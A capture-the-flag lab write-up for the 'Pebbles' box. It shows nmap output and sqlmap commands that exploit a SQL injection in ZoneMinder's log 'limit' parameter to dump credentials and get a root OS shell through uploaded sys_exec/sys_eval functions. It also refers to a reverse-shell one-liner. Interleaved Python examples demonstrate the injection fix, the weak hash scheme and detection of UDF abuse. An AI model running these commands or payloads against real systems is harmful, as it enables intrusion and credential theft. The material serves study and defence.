Pebbles
Intro
Initial Foothold
Full TCP Port Scan
# Nmap 7.94SVN scan initiated Fri Apr 12 09:23:41 2024 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/joe/hax/pg/results/pebbles.pg/scans/_full_tcp_nmap.txt -oX /home/joe/hax/pg/results/pebbles.pg/scans/xml/_full_tcp_nmap.xml pebbles.pg
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds. Ignoring time.
Nmap scan report for pebbles.pg (192.168.247.52)
Host is up, received user-set (0.040s latency).
Scanned at 2024-04-12 09:23:42 CDT for 113s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
| 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
3305/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.11 - 4.1 (88%), Linux 4.4 (88%), Linux 3.2.0 (85%), Linux 3.16 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=4/12%OT=21%CT=%CU=%PV=Y%DS=4%DC=T%G=N%TM=6619445F%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10C%TI=Z%TS=8)
OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M551NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 0.005 days (since Fri Apr 12 09:19:05 2024)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 39.62 ms 192.168.45.1
2 39.54 ms 192.168.45.254
3 39.88 ms 192.168.251.1
4 39.80 ms pebbles.pg (192.168.247.52)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 12 09:25:35 2024 -- 1 IP address (1 host up) scanned in 114.29 seconds
Open Ports
21/tcp - vsftpd 3.0.3
22/tcp - OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp - Apache httpd 2.4.18 ((Ubuntu))
3305/tcp - Apache httpd 2.4.18 ((Ubuntu))
8080/tcp - Apache httpd 2.4.18 ((Ubuntu))
Testing 21/tcp
No anonymous logon available
Credentials admin/admin did not result in access
Testing 22/tcp
No brute forcing performed yet
Testing 80/tcp
Login form was available on landing page
Login form not vulnerable to SQLi up to Level/Risk 2 via sqlmap
Found interesting directory - zm (ZoneMinder application)
Testing 8080/tcp
No login page observed
Found interesting directory - zm (ZoneMinder application)
Testing 3305/tcp
No login page observed
Found interesting directory - zm (ZoneMinder application)
Performed SQLi against the limit parameter of the ZoneMinder 1.29.0 log query request, dumping the Users table
sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' -D 'zm' -T 'Users' -C Username,Password --dump
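The root cause of the dump above is a numeric parameter that reaches the SQL engine as text. The following is an added example, not ZoneMinder's code: it shows the vulnerable string-splicing pattern beside a hardened version that validates the value as a bounded integer and binds it as a parameter. The Logs table, its rows and the MAX_LIMIT bound are constructed for the demo.

```python
"""Added example (not ZoneMinder's code): a 'limit' request parameter spliced
into SQL versus the same query with validation and a bound parameter.
The table and rows are constructed in memory so the demo runs offline."""
import sqlite3

MAX_LIMIT = 1000  # assumed upper bound; choose whatever the UI actually needs


def build_query_unsafe(limit):
    """Vulnerable pattern: the raw request value becomes part of the SQL text,
    so a value such as '100;SELECT SLEEP(5)#' turns into a second, stacked
    statement on a DBMS that allows it."""
    return "SELECT Id, Message FROM Logs ORDER BY TimeKey DESC LIMIT " + limit


def validate_limit(raw):
    """Hardened pattern: accept only a decimal integer inside [1, MAX_LIMIT].
    Separators, comment markers and letters are refused before any SQL is built."""
    if not isinstance(raw, str) or not raw.isdecimal():
        raise ValueError("limit must be a positive integer")
    value = int(raw)
    if not 1 <= value <= MAX_LIMIT:
        raise ValueError("limit out of range")
    return value


def fetch_logs(conn, raw_limit):
    """Runs the query with a bound parameter; user text is never parsed as SQL."""
    limit = validate_limit(raw_limit)
    cur = conn.execute(
        "SELECT Id, Message FROM Logs ORDER BY TimeKey DESC LIMIT ?", (limit,)
    )
    return cur.fetchall()


def demo_connection():
    """Constructed in-memory stand-in for the zm.Logs table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Logs (Id INTEGER PRIMARY KEY, TimeKey REAL, Message TEXT)"
    )
    conn.executemany(
        "INSERT INTO Logs (TimeKey, Message) VALUES (?, ?)",
        [(1.0 + i, f"constructed log line {i}") for i in range(5)],
    )
    return conn


def injection_rejected(raw):
    """True when the hardened path refuses the value."""
    try:
        validate_limit(raw)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "100;SELECT SLEEP(5)#"
    print("unsafe SQL :", build_query_unsafe(payload))
    print("rejected   :", injection_rejected(payload))
    print("bounded run:", fetch_logs(demo_connection(), "3"))
```

The bound parameter alone would already stop the injection, but the integer check matters too: it keeps a LIMIT of "9999999999" from turning a log view into a denial of service, and it gives the application a clear place to log rejected values for detection.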
...
[10:12:07] [INFO] cracked password 'admin' for user 'admin'
Database: zm
Table: Users
[1 entry]
+----------+---------------------------------------------------+
| Username | Password |
+----------+---------------------------------------------------+
| admin | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
+----------+---------------------------------------------------+
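sqlmap matched the dumped hash instantly because the Users table stores the MySQL native_password form, which is '*' followed by the upper-case hex of SHA1(SHA1(password)) with no salt and no work factor. The following added example (not part of the original writeup or of ZoneMinder) recomputes that scheme and checks a single candidate against the dumped value, which is the check a defender runs to confirm whether a weak, unsalted scheme is in use before moving the application to a salted, slow hash such as bcrypt or Argon2.

```python
"""Added example (not from the writeup): reproduce MySQL's native_password
hash and compare one candidate against the value dumped from zm.Users.
The scheme is '*' + HEX(SHA1(SHA1(password))): unsalted and fast, which is
why a dictionary word is recovered in negligible time."""
import hashlib
import hmac

# Value taken from the sqlmap dump above.
DUMPED_ADMIN_HASH = "*4ACFE3202A5FF5CF467898FC58AAB1D615029441"


def mysql_native_password(password):
    """Return the MySQL 4.1+ native_password hash of a UTF-8 password."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def matches_stored_hash(candidate, stored):
    """Constant-time comparison of a candidate's hash with a stored value."""
    return hmac.compare_digest(mysql_native_password(candidate), stored)


def is_native_password_format(stored):
    """True when a stored value looks like the unsalted native_password scheme,
    i.e. the scheme an audit should flag for migration to bcrypt/Argon2."""
    return (
        len(stored) == 41
        and stored[0] == "*"
        and all(c in "0123456789ABCDEF" for c in stored[1:])
    )


if __name__ == "__main__":
    print(mysql_native_password("admin"))
    print("admin matches dump:", matches_stored_hash("admin", DUMPED_ADMIN_HASH))
    print("unsalted scheme in use:", is_native_password_format(DUMPED_ADMIN_HASH))
```

Two users with the same password get the same hash under this scheme, so a single dumped table reveals every shared and default password at once; a salted, iterated hash removes both the shortcut and the cross-user correlation.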
Attempting --os-shell option in sqlmap
sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' --os-shell
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:05:08 /2024-04-12/
[11:05:08] [INFO] resuming back-end DBMS 'mysql'
[11:05:08] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ZMSESSID=muf90i9ed6t...1llf5i72a1;zmSkin=classic;zmCSS=classic'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: limit (POST)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#
---
[11:05:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[11:05:10] [INFO] fingerprinting the back-end DBMS operating system
[11:05:10] [INFO] the back-end DBMS operating system is Linux
[11:05:10] [INFO] testing if current user is DBA
[11:05:10] [INFO] fetching current user
[11:05:10] [INFO] resumed: root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[11:05:15] [INFO] checking if UDF 'sys_exec' already exist
[11:05:15] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] y
[11:05:29] [INFO] checking if UDF 'sys_eval' already exist
[11:05:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[11:05:29] [INFO] detecting back-end DBMS version from its banner
[11:05:29] [INFO] resumed: 5.7.30-0ubuntu0.16.04.1
[11:05:29] [INFO] retrieving MySQL plugin directory absolute path
[11:05:29] [INFO] resumed: /usr/lib/mysql/plugin/
[11:05:32] [INFO] retrieved:
[11:05:42] [INFO] adjusting time delay to 1 second due to good response times
8040
[11:05:50] [INFO] the local file '/tmp/sqlmapsu8jrs7w61063/lib_mysqludf_sysjm3mu5i0.so' and the remote file '/usr/lib/mysql/plugin/libsbtnb.so' have the same size (8040 B)
[11:05:50] [INFO] creating UDF 'sys_exec' from the binary UDF file
[11:05:50] [INFO] creating UDF 'sys_eval' from the binary UDF file
[11:05:50] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[11:05:50] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:03] [INFO] retrieved: root
command standard output: 'root'
os-shell> cat /root/proof.txt
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:33] [INFO] retrieved: 7574772785970f747047e659aa85b43a
command standard output: '7574772785970f747047e659aa85b43a'
To catch a reverse shell, run the nc mkfifo reverse-shell one-liner through sqlmap's --os-shell.
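The os-shell above worked only because the application's database account was root@localhost with FILE and CREATE FUNCTION rights, which let sqlmap write a shared object into the plugin directory and register sys_exec/sys_eval. The following added example (not from the writeup) is the post-incident check a responder would run: it audits rows shaped like the output of SELECT name, dl FROM mysql.func together with a listing of the plugin directory. The rows, the listing and the ALLOWED_PLUGINS set are constructed here; replace the allowlist with the shared objects your MySQL packages actually ship.

```python
"""Added example (not from the writeup): detect the user-defined-function
abuse shown in the sqlmap session. Inputs are constructed to mirror what
`SELECT name, dl FROM mysql.func` and a listing of /usr/lib/mysql/plugin/
could return on the compromised host."""
import re

# Hypothetical allowlist of plugin files a clean install is expected to have.
ALLOWED_PLUGINS = {"auth_socket.so", "validate_password.so", "mysql_no_login.so"}

# Functions registered by the lib_mysqludf_sys library that sqlmap uploads.
SUSPICIOUS_UDFS = {"sys_exec", "sys_eval", "sys_get", "sys_set"}

# Short, random-looking library names like the libsbtnb.so seen in the session.
RANDOM_NAME = re.compile(r"^lib[a-z0-9]{4,8}\.so$")

# Constructed rows shaped like `SELECT name, dl FROM mysql.func`.
FUNC_ROWS = [("sys_exec", "libsbtnb.so"), ("sys_eval", "libsbtnb.so")]

# Constructed plugin directory listing: (filename, size in bytes).
PLUGIN_DIR_LISTING = [
    ("auth_socket.so", 31088),
    ("validate_password.so", 53144),
    ("libsbtnb.so", 8040),
]


def audit_udfs(func_rows, plugin_listing, allowed=ALLOWED_PLUGINS):
    """Return a list of findings; an empty list means nothing looked out of place."""
    findings = []
    for name, dl in func_rows:
        if name in SUSPICIOUS_UDFS:
            findings.append(f"UDF {name} from {dl}: OS command execution capability")
        elif dl not in allowed:
            findings.append(f"UDF {name} loads non-allowlisted library {dl}")
    for fname, size in plugin_listing:
        if fname in allowed:
            continue
        reason = "random-looking name" if RANDOM_NAME.match(fname) else "not in allowlist"
        findings.append(f"unexpected plugin file {fname} ({size} B): {reason}")
    return findings


def app_account_overprivileged(user, host, is_superuser):
    """Least-privilege check: a web application's DB account should never be
    a superuser, and a root@localhost connection from the web tier is the
    condition that made the UDF upload possible in the first place."""
    return is_superuser or user == "root"


if __name__ == "__main__":
    for line in audit_udfs(FUNC_ROWS, PLUGIN_DIR_LISTING):
        print("FINDING:", line)
    print("web tier DB account overprivileged:",
          app_account_overprivileged("root", "localhost", True))
```

Remediation follows directly from the findings: drop the rogue functions, remove the shared object, rotate the database credentials, and reconnect the application with a dedicated account that holds only the table privileges it needs and neither FILE nor CREATE FUNCTION. The cleanup should also be treated as a sign the host is fully compromised, since the functions already executed as the mysqld user.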
Privilege Escalation
No privilege escalation required